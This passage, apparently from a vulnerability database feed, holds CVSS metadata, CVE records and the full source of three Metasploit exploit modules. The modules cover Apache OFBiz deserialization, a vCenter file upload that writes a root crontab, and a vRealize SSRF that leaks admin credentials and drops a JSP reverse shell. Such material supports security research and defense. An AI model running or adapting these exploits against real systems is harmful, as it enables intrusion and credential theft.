"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2021-04-02T21:14:06", "type": "githubexploit", "title": "Exploit for Server-Side Request Forgery in Vmware Vrealize Operations Manager", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 8.5, "vectorString": "AV:N/AC:L/Au:S/C:N/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 9.2, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21983", "CVE-2021-21975"], "modified": "2021-10-24T06:02:36", "id": "D5702470-2A4B-5116-9B9F-4001BDD6935C", "href": "", "cvss": {"score": 8.5, "vector": "AV:N/AC:L/Au:S/C:N/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-02-01T00:00:00", "description": "## Impacted Products\r\n\r\n- VMware vRealize Operations 8.3.0\u30018.2.0...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2021-03-31T15:40:09", "type": "githubexploit", "title": "Exploit for Server-Side Request Forgery in Vmware Vrealize Operations Manager", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 8.5, "vectorString": "AV:N/AC:L/Au:S/C:N/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 9.2, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21983", "CVE-2021-21975"], "modified": "2021-11-08T08:21:55", "id": "29AADC8A-DEC3-59E3-BF20-A227E39A5083", "href": "", "cvss": {"score": 8.5, "vector": "AV:N/AC:L/Au:S/C:N/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-02-19T19:57:08", "description": "# REALITY_SMASHER\nvRealize RCE + Privesc (CVE-2021-21975, CVE-20...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2021-04-06T23:24:38", "type": "githubexploit", "title": "Exploit for Server-Side Request Forgery in Vmware Vrealize Operations Manager", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 8.5, "vectorString": "AV:N/AC:L/Au:S/C:N/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 9.2, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21983", "CVE-2021-21975"], "modified": "2022-02-19T17:06:47", "id": "911A7F63-1DBC-54A3-820C-F8F19E006338", "href": "", "cvss": {"score": 8.5, "vector": "AV:N/AC:L/Au:S/C:N/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-03-16T14:28:37", "description": "<b>[CVE-2021-21975] VMware vRealize Operations (vROps) Manager A...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2022-03-16T11:56:25", "type": "githubexploit", "title": "Exploit for Vulnerability in Vmware Vrealize Operations Manager", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 8.5, "vectorString": "AV:N/AC:L/Au:S/C:N/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 9.2, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21975", "CVE-2021-21983"], "modified": "2022-03-16T13:53:28", "id": "33268543-6217-5EB6-9E15-3AD5A03E3B8E", "href": "", "cvss": {"score": 8.5, "vector": "AV:N/AC:L/Au:S/C:N/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-03-23T19:04:50", "description": "# CVE-2021-22005_PoC\nCVE-2021-22005_PoC\n\n\n\n\ngetshel...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-09-27T03:18:09", "type": "githubexploit", "title": "Exploit for Unrestricted Upload of File with Dangerous Type in Vmware Cloud Foundation", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-20050", "CVE-2021-22005"], "modified": "2021-12-18T07:16:48", "id": "1C9826FA-B0AD-5C2E-81E6-5842CAA51C4B", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}], "metasploit": [{"lastseen": "2023-01-07T00:51:08", "description": "This module exploits a Java deserialization vulnerability in Apache OFBiz's unauthenticated SOAP endpoint /webtools/control/SOAPService for versions prior to 17.12.06.\n", "cvss3": {}, "published": "2021-03-30T22:18:16", "type": "metasploit", "title": "Apache OFBiz SOAP Java Deserialization", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2021-26295"], "modified": "2021-04-05T14:33:20", "id": "MSF:EXPLOIT-LINUX-HTTP-APACHE_OFBIZ_DESERIALIZATION_SOAP-", "href": "https://www.rapid7.com/db/modules/exploit/linux/http/apache_ofbiz_deserialization_soap/", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n\n Rank = ExcellentRanking\n\n prepend Msf::Exploit::Remote::AutoCheck\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::CmdStager\n include Msf::Exploit::JavaDeserialization\n\n XML_NS = {\n 'serResponse' => 'http://ofbiz.apache.org/service/',\n 'soapenv' => 'http://schemas.xmlsoap.org/soap/envelope/'\n }.freeze\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'Apache OFBiz SOAP Java Deserialization',\n 'Description' => %q{\n This module exploits a Java deserialization vulnerability in Apache\n OFBiz's unauthenticated SOAP endpoint /webtools/control/SOAPService for\n versions prior to 17.12.06.\n },\n 'Author' => [\n 'yumusb', # original PoC\n 'Spencer McIntyre', # metasploit module\n 'wvu' # metasploit module\n ],\n 'References' => [\n [ 'CVE', '2021-26295' ],\n [ 'URL', 'https://github.com/yumusb/CVE-2021-26295-POC/blob/main/poc.py' ],\n [ 'URL', 'https://issues.apache.org/jira/browse/OFBIZ-12167' ]\n ],\n 'DisclosureDate' => '2021-03-22', # NVD publish date\n 'License' => MSF_LICENSE,\n 'Platform' => ['unix', 'linux'],\n 'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64],\n 'Privileged' => false,\n 'Targets' => [\n [\n 'Unix Command',\n {\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n 'Type' => :unix_cmd,\n 'DefaultOptions' => {\n 'PAYLOAD' => 'cmd/unix/reverse_python_ssl'\n }\n }\n ],\n [\n 'Linux Dropper',\n {\n 'Platform' => 'linux',\n 'Arch' => [ARCH_X86, ARCH_X64],\n 'Type' => :linux_dropper,\n 'DefaultOptions' => {\n 'CMDSTAGER::FLAVOR' => :curl,\n 'PAYLOAD' => 'linux/x64/meterpreter_reverse_https'\n }\n }\n ]\n ],\n 'DefaultTarget' => 1,\n 'DefaultOptions' => {\n 'SSL' => true\n },\n 'Notes' => {\n 'Stability' => [CRASH_SAFE],\n 'Reliability' => [REPEATABLE_SESSION],\n 'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]\n }\n )\n )\n\n register_options([\n Opt::RPORT(8443),\n OptString.new('TARGETURI', [true, 'Base path', '/'])\n ])\n end\n\n def check\n # Send an empty serialized object\n res = send_request_soap('')\n\n unless res\n return CheckCode::Unknown('Target did not respond to check.')\n end\n\n messages = {}\n res.get_xml_document.xpath('//soapenv:Envelope/soapenv:Body/serResponse:serResponse/serResponse:map-HashMap/serResponse:map-Entry', XML_NS).each do |entry|\n key = entry.xpath('serResponse:map-Key/serResponse:std-String/@value', XML_NS).to_s\n messages[key] = entry.xpath('serResponse:map-Value/serResponse:std-String/@value', XML_NS).to_s\n end\n\n if messages['errorMessage']&.start_with?('Problem deserializing object from byte array')\n return CheckCode::Vulnerable('Target can deserialize arbitrary data.')\n end\n\n CheckCode::Safe('Target cannot deserialize arbitrary data.')\n end\n\n def exploit\n print_status(\"Executing #{target.name} for #{datastore['PAYLOAD']}\")\n\n case target['Type']\n when :unix_cmd\n execute_command(payload.encoded)\n when :linux_dropper\n execute_cmdstager\n end\n end\n\n def execute_command(cmd, _opts = {})\n vprint_status(\"Executing command: #{cmd}\")\n\n res = send_request_soap(\n # framework/webapp/lib/rome-0.9.jar\n generate_java_deserialization_for_command('ROME', 'bash', cmd)\n )\n\n unless res && res.code == 200\n fail_with(Failure::UnexpectedReply, \"Failed to execute command: #{cmd}\")\n end\n\n print_good(\"Successfully executed command: #{cmd}\")\n end\n\n def send_request_soap(data)\n send_request_cgi(\n 'method' => 'POST',\n 'uri' => normalize_uri(target_uri.path, '/webtools/control/SOAPService'),\n 'ctype' => 'text/xml',\n 'data' => <<~XML\n <soapenv:Envelope xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\">\n <soapenv:Header/>\n <soapenv:Body>\n <ser>\n <map-HashMap>\n <map-Entry>\n <map-Key>\n <cus-obj>#{Rex::Text.to_hex(data, '')}</cus-obj>\n </map-Key>\n <map-Value>\n <std-String value=\"http://#{Faker::Internet.domain_name}\"/>\n </map-Value>\n </map-Entry>\n </map-HashMap>\n </ser>\n </soapenv:Body>\n </soapenv:Envelope>\n XML\n )\n end\n\nend\n", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/linux/http/apache_ofbiz_deserialization_soap.rb", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2022-08-19T22:40:51", "description": "This module exploits a file upload in VMware vCenter Server's analytics/telemetry (CEIP) service to write a system crontab and execute shell commands as the root user. Note that CEIP must be enabled for the target to be exploitable by this module. CEIP is enabled by default.\n", "cvss3": {}, "published": "2021-10-06T21:43:57", "type": "metasploit", "title": "VMware vCenter Server Analytics (CEIP) Service File Upload", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2021-22005"], "modified": "2021-10-20T19:16:46", "id": "MSF:EXPLOIT-LINUX-HTTP-VMWARE_VCENTER_ANALYTICS_FILE_UPLOAD-", "href": "https://www.rapid7.com/db/modules/exploit/linux/http/vmware_vcenter_analytics_file_upload/", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n\n Rank = ExcellentRanking\n\n prepend Msf::Exploit::Remote::AutoCheck\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::CmdStager\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'VMware vCenter Server Analytics (CEIP) Service File Upload',\n 'Description' => %q{\n This module exploits a file upload in VMware vCenter Server's\n analytics/telemetry (CEIP) service to write a system crontab and\n execute shell commands as the root user.\n\n Note that CEIP must be enabled for the target to be exploitable by\n this module. CEIP is enabled by default.\n },\n 'Author' => [\n 'George Noseevich', # Discovery\n 'Sergey Gerasimov', # Discovery\n 'VMware', # Initial PoC\n 'Derek Abdine', # Analysis\n 'wvu' # Analysis and exploit\n ],\n 'References' => [\n ['CVE', '2021-22005'],\n ['URL', 'https://www.vmware.com/security/advisories/VMSA-2021-0020.html'],\n ['URL', 'https://attackerkb.com/topics/15E0q0tdEZ/cve-2021-22005/rapid7-analysis'],\n ['URL', 'https://censys.io/blog/vmware-cve-2021-22005-technical-impact-analysis/'],\n ['URL', 'https://testbnull.medium.com/quick-note-of-vcenter-rce-cve-2021-22005-4337d5a817ee']\n ],\n 'DisclosureDate' => '2021-09-21',\n 'License' => MSF_LICENSE,\n 'Platform' => ['unix', 'linux'],\n 'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64],\n 'Privileged' => true,\n 'Targets' => [\n [\n 'Unix Command',\n {\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n 'Type' => :cmd,\n 'DefaultOptions' => {\n 'PAYLOAD' => 'cmd/unix/reverse_perl_ssl'\n }\n }\n ],\n [\n 'Linux Dropper',\n {\n 'Platform' => 'linux',\n 'Arch' => [ARCH_X86, ARCH_X64],\n 'Type' => :dropper,\n 'DefaultOptions' => {\n 'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp'\n }\n }\n ]\n ],\n 'DefaultTarget' => 0,\n 'DefaultOptions' => {\n 'RPORT' => 443,\n 'SSL' => true,\n 'WfsDelay' => 60\n },\n 'Notes' => {\n 'Stability' => [CRASH_SAFE],\n 'Reliability' => [REPEATABLE_SESSION],\n 'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]\n }\n )\n )\n\n register_options([\n OptString.new('TARGETURI', [true, 'Base path', '/'])\n ])\n end\n\n def check\n res = send_request_cgi(\n 'method' => 'GET',\n 'uri' => normalize_uri(target_uri.path, '/analytics/telemetry/ph/api/level'),\n 'vars_get' => {\n '_c' => ''\n }\n )\n\n return CheckCode::Unknown unless res\n\n unless res.code == 200 && res.body == '\"FULL\"'\n return CheckCode::Safe('CEIP is not fully enabled.')\n end\n\n CheckCode::Appears('CEIP is fully enabled.')\n end\n\n def exploit\n print_status('Creating path traversal')\n\n # /var/log/vmware/analytics/prod/_c_i/\n unless write_file(rand_text_alphanumeric(8..16))\n fail_with(Failure::NotVulnerable, 'Failed to create path traversal')\n end\n\n print_good('Successfully created path traversal')\n\n print_status(\"Executing #{payload_instance.refname} (#{target.name})\")\n\n case target['Type']\n when :cmd\n execute_command(payload.encoded)\n when :dropper\n execute_cmdstager\n end\n\n print_warning(\"Please wait up to #{wfs_delay} seconds for a session\")\n end\n\n def execute_command(cmd, _opts = {})\n print_status(\"Writing system crontab: #{crontab_path}\")\n\n crontab_file = crontab(cmd)\n vprint_line(crontab_file)\n\n # /var/log/vmware/analytics/prod/_c_i/../../../../../../etc/cron.d/\n unless write_file(\"../../../../../../etc/cron.d/#{crontab_name}\", crontab_file)\n fail_with(Failure::PayloadFailed, 'Failed to write system crontab')\n end\n\n print_good('Successfully wrote system crontab')\n end\n\n def write_file(path, data = nil)\n res = send_request_cgi(\n 'method' => 'POST',\n 'uri' => normalize_uri(target_uri.path, '/analytics/telemetry/ph/api/hyper/send'),\n 'ctype' => 'application/json',\n 'vars_get' => {\n '_c' => '',\n '_i' => \"/#{path}\"\n },\n 'data' => data\n )\n\n return false unless res&.code == 201\n\n true\n end\n\n def crontab(cmd)\n # https://man7.org/linux/man-pages/man5/crontab.5.html\n <<~CRONTAB.strip\n * * * * * root rm -rf #{crontab_path} /var/log/vmware/analytics/prod/_c_i/\n * * * * * root #{cmd}\n CRONTAB\n end\n\n def crontab_path\n \"/etc/cron.d/#{crontab_name}.json\"\n end\n\n def crontab_name\n @crontab_name ||= rand_text_alphanumeric(8..16)\n end\n\nend\n", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/linux/http/vmware_vcenter_analytics_file_upload.rb", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-27T15:13:04", "description": "This module exploits a pre-auth SSRF (CVE-2021-21975) and post-auth file write (CVE-2021-21983) in VMware vRealize Operations Manager to leak admin creds and write/execute a JSP payload. CVE-2021-21975 affects the /casa/nodes/thumbprints endpoint, and CVE-2021-21983 affects the /casa/private/config/slice/ha/certificate endpoint. Code execution occurs as the \"admin\" Unix user. The following vRealize Operations Manager versions are vulnerable: * 7.0.0 * 7.5.0 * 8.0.0, 8.0.1 * 8.1.0, 8.1.1 * 8.2.0 * 8.3.0 Version 8.3.0 is not exploitable for creds and is therefore not supported by this module. Tested successfully against 8.0.1, 8.1.0, 8.1.1, and 8.2.0.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2021-04-21T15:42:10", "type": "metasploit", "title": "VMware vRealize Operations (vROps) Manager SSRF RCE", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 8.5, "vectorString": "AV:N/AC:L/Au:S/C:N/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 9.2, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21975", "CVE-2021-21983"], "modified": "2021-05-06T23:30:20", "id": "MSF:EXPLOIT-LINUX-HTTP-VMWARE_VROPS_MGR_SSRF_RCE-", "href": "https://www.rapid7.com/db/modules/exploit/linux/http/vmware_vrops_mgr_ssrf_rce/", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n\n Rank = ExcellentRanking\n\n prepend Msf::Exploit::Remote::AutoCheck\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::Remote::HttpServer\n include Msf::Exploit::FileDropper\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'VMware vRealize Operations (vROps) Manager SSRF RCE',\n 'Description' => %q{\n This module exploits a pre-auth SSRF (CVE-2021-21975) and post-auth\n file write (CVE-2021-21983) in VMware vRealize Operations Manager to\n leak admin creds and write/execute a JSP payload.\n\n CVE-2021-21975 affects the /casa/nodes/thumbprints endpoint, and\n CVE-2021-21983 affects the /casa/private/config/slice/ha/certificate\n endpoint. Code execution occurs as the \"admin\" Unix user.\n\n The following vRealize Operations Manager versions are vulnerable:\n\n * 7.0.0\n * 7.5.0\n * 8.0.0, 8.0.1\n * 8.1.0, 8.1.1\n * 8.2.0\n * 8.3.0\n\n Version 8.3.0 is not exploitable for creds and is therefore not\n supported by this module. Tested successfully against 8.0.1, 8.1.0,\n 8.1.1, and 8.2.0.\n },\n 'Author' => [\n 'Egor Dimitrenko', # Discovery\n 'wvu' # Analysis and exploit\n ],\n 'References' => [\n ['CVE', '2021-21975'], # SSRF\n ['CVE', '2021-21983'], # File write\n ['URL', 'https://www.vmware.com/security/advisories/VMSA-2021-0004.html'],\n ['URL', 'https://twitter.com/ptswarm/status/1376961747232382976'],\n ['URL', 'https://attackerkb.com/topics/51Vx3lNI7B/cve-2021-21975#rapid7-analysis']\n ],\n 'DisclosureDate' => '2021-03-30', # Vendor advisory\n 'License' => MSF_LICENSE,\n 'Platform' => 'linux',\n 'Arch' => ARCH_JAVA,\n 'Privileged' => false,\n 'Targets' => [\n ['vRealize Operations Manager < 8.3.0', {}]\n ],\n 'DefaultTarget' => 0,\n 'DefaultOptions' => {\n 'SRVPORT' => 8443,\n 'SSL' => true,\n 'PAYLOAD' => 'java/jsp_shell_reverse_tcp'\n },\n 'Notes' => {\n 'Stability' => [CRASH_SAFE],\n 'Reliability' => [REPEATABLE_SESSION],\n 'SideEffects' => [\n IOC_IN_LOGS, # /usr/lib/vmware-casa/casa-webapp/logs\n ARTIFACTS_ON_DISK # /usr/lib/vmware-casa/casa-webapp/webapps/casa\n ]\n },\n 'Stance' => Stance::Aggressive\n )\n )\n\n register_options([\n Opt::RPORT(443),\n OptString.new('TARGETURI', [true, 'Base path', '/'])\n ])\n end\n\n def setup\n super\n\n @creds = nil\n\n print_status('Starting SSRF server...')\n start_service\n end\n\n def check\n leak_admin_creds ? CheckCode::Vulnerable : CheckCode::Safe\n end\n\n def exploit\n return unless (@creds ||= leak_admin_creds)\n\n write_jsp_payload\n execute_jsp_payload\n end\n\n def leak_admin_creds\n # \"Comment out\" trailing path using URI fragment syntax, ostensibly\n ssrf_uri = \"#{srvhost_addr}:#{srvport}#{get_resource}#\"\n\n print_status('Leaking admin creds via SSRF...')\n vprint_status(ssrf_uri)\n\n res = send_request_cgi(\n 'method' => 'POST',\n 'uri' => normalize_uri(target_uri.path, '/casa/nodes/thumbprints'),\n 'ctype' => 'application/json',\n 'data' => [ssrf_uri].to_json\n )\n\n unless res&.code == 200 && res.get_json_document.dig(0, 'address') == ssrf_uri\n print_error('Failed to send SSRF request')\n return\n end\n\n unless @creds\n print_error('Failed to leak admin creds')\n return\n end\n\n print_good('Successfully leaked admin creds')\n vprint_status(\"Authorization: #{@creds}\")\n\n @creds\n end\n\n def on_request_uri(cli, request)\n print_status(\"#{cli.peerhost} connected to SSRF server!\")\n vprint_line(request.to_s)\n\n @creds ||= request.headers['Authorization']\n ensure\n send_not_found(cli)\n close_client(cli)\n end\n\n def write_jsp_payload\n jsp_path = \"/usr/lib/vmware-casa/casa-webapp/webapps/casa/#{jsp_filename}\"\n\n print_status('Writing JSP payload')\n vprint_status(jsp_path)\n\n multipart_form = Rex::MIME::Message.new\n multipart_form.add_part(\n \"../../../../..#{jsp_path}\",\n nil, # Content-Type\n nil, # Content-Transfer-Encoding\n 'form-data; name=\"name\"'\n )\n multipart_form.add_part(\n payload.encoded,\n nil, # Content-Type\n nil, # Content-Transfer-Encoding\n %(form-data; name=\"file\"; filename=\"#{jsp_filename}\")\n )\n\n res = send_request_cgi(\n 'method' => 'POST',\n 'uri' => normalize_uri(target_uri.path, '/casa/private/config/slice/ha/certificate'),\n 'authorization' => @creds,\n 'ctype' => \"multipart/form-data; boundary=#{multipart_form.bound}\",\n 'data' => multipart_form.to_s\n )\n\n unless res&.code == 200\n fail_with(Failure::NotVulnerable, 'Failed to write JSP payload')\n end\n\n register_file_for_cleanup(jsp_path)\n\n print_good('Successfully wrote JSP payload')\n end\n\n def execute_jsp_payload\n jsp_uri = normalize_uri(target_uri.path, 'casa', jsp_filename)\n\n print_status('Executing JSP payload')\n vprint_status(full_uri(jsp_uri))\n\n res = send_request_cgi(\n 'method' => 'GET',\n 'uri' => jsp_uri,\n 'authorization' => @creds\n )\n\n unless res&.code == 200\n fail_with(Failure::PayloadFailed, 'Failed to execute JSP payload')\n end\n\n print_good('Successfully executed JSP payload')\n end\n\n def jsp_filename\n @jsp_filename ||= \"#{rand_text_alphanumeric(8..16)}.jsp\"\n end\n\nend\n", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/linux/http/vmware_vrops_mgr_ssrf_rce.rb", "cvss": {"score": 8.5, "vector": "AV:N/AC:L/Au:S/C:N/I:C/A:C"}}], "cve": [{"lastseen": "2023-05-27T14:31:00", "description": "Apache OFBiz has unsafe deserialization prior to 17.12.06. An unauthenticated attacker can use this vulnerability to successfully take over Apache OFBiz.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-03-22T12:15:00", "type": "cve", "title": "CVE-2021-26295", "cwe": ["CWE-502"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26295"], "modified": "2021-09-16T15:44:00", "cpe": [], "id": "CVE-2021-26295", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-26295", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": []}, {"lastseen": "2023-05-27T14:21:46", "description": "Server Side Request Forgery in vRealize Operations Manager API (CVE-2021-21975) prior to 8.4 may allow a malicious actor with network access to the vRealize Operations Manager API can perform a Server Side Request Forgery attack to steal administrative credentials.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2021-03-31T18:15:00", "type": "cve", "title": "CVE-2021-21975", "cwe": ["CWE-918"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21975"], "modified": "2022-02-01T17:45:00", "cpe": ["cpe:/a:vmware:vrealize_operations_manager:8.1.1", "cpe:/a:vmware:cloud_foundation:3.7.1", "cpe:/a:vmware:vrealize_operations_manager:8.3.0", "cpe:/a:vmware:cloud_foundation:3.9", "cpe:/a:vmware:cloud_foundation:3.8", "cpe:/a:vmware:cloud_foundation:3.8.1", "cpe:/a:vmware:vrealize_operations_manager:7.0.0", "cpe:/a:vmware:cloud_foundation:4.0.1", "cpe:/a:vmware:vrealize_operations_manager:8.0.1", "cpe:/a:vmware:vrealize_operations_manager:8.0.0", "cpe:/a:vmware:vrealize_operations_manager:8.2.0", "cpe:/a:vmware:cloud_foundation:4.0", "cpe:/a:vmware:vrealize_operations_manager:8.1.0", "cpe:/a:vmware:vrealize_suite_lifecycle_manager:8.1", "cpe:/a:vmware:cloud_foundation:3.5", "cpe:/a:vmware:vrealize_operations_manager:7.5.0", "cpe:/a:vmware:vrealize_suite_lifecycle_manager:8.2", "cpe:/a:vmware:cloud_foundation:3.7", "cpe:/a:vmware:vrealize_suite_lifecycle_manager:8.0.1", "cpe:/a:vmware:vrealize_suite_lifecycle_manager:8.0", 